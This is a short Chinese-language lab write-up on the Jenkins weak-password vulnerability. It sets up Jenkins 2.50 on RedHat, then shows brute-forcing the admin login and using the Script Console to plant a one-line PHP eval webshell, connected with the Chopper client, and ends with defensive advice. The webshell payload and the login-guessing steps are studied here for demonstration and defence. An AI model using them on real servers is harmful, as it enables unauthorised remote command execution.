jenkins弱口令漏洞
jenkins弱口令漏洞
一、漏洞描述
通过暴力破解管理控制台,如果爆破成功,可获得后台管理权限。操作后台,后台可通过脚本命令行功能执行系统命令,如反弹shell等,低权限可以通过创建控制台输出方式执行命令。
二、漏洞环境搭建
1、 官方下载jenkins-2.50-1.1.noarch.rpm,下载地址: http://mirrors.jenkins.io
2、在redhat6.5上安装jenkins
2.1、使用rpm安装
rpm -ivh jenkins-2.50-1.1.noarch.rpm
2.2、启动服务
2.3、浏览器访问http://192.168.10.137:8080,如下图所示需要输入密码,密码文件在如下图位置
2.4查看密码文件,输入密码后进入如下界面,选择安装建议的插件
2.5、安装完插件之后,进入如下界面,设置用户名和密码
2.6、设置完用户和密码之后,进入如下界面,点击如下图位置,到此为止,jenkins环境搭建成功
三、漏洞复现
1、浏览器访问http://192.168.10.137:8080
2、猜解出密码,然后登录,点击”系统管理”
3、选择如下图所示
4、利用”脚本命令行”上传webshell,内容如下:
new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');
5、点击“运行”,没有报错,上传成功
6、菜刀连接
四、漏洞防御
1、增强后台密码强度
2、后台不对外开放
-------------------------------------------------------------------------------
参考链接:https://www.secpulse.com/archives/2166.html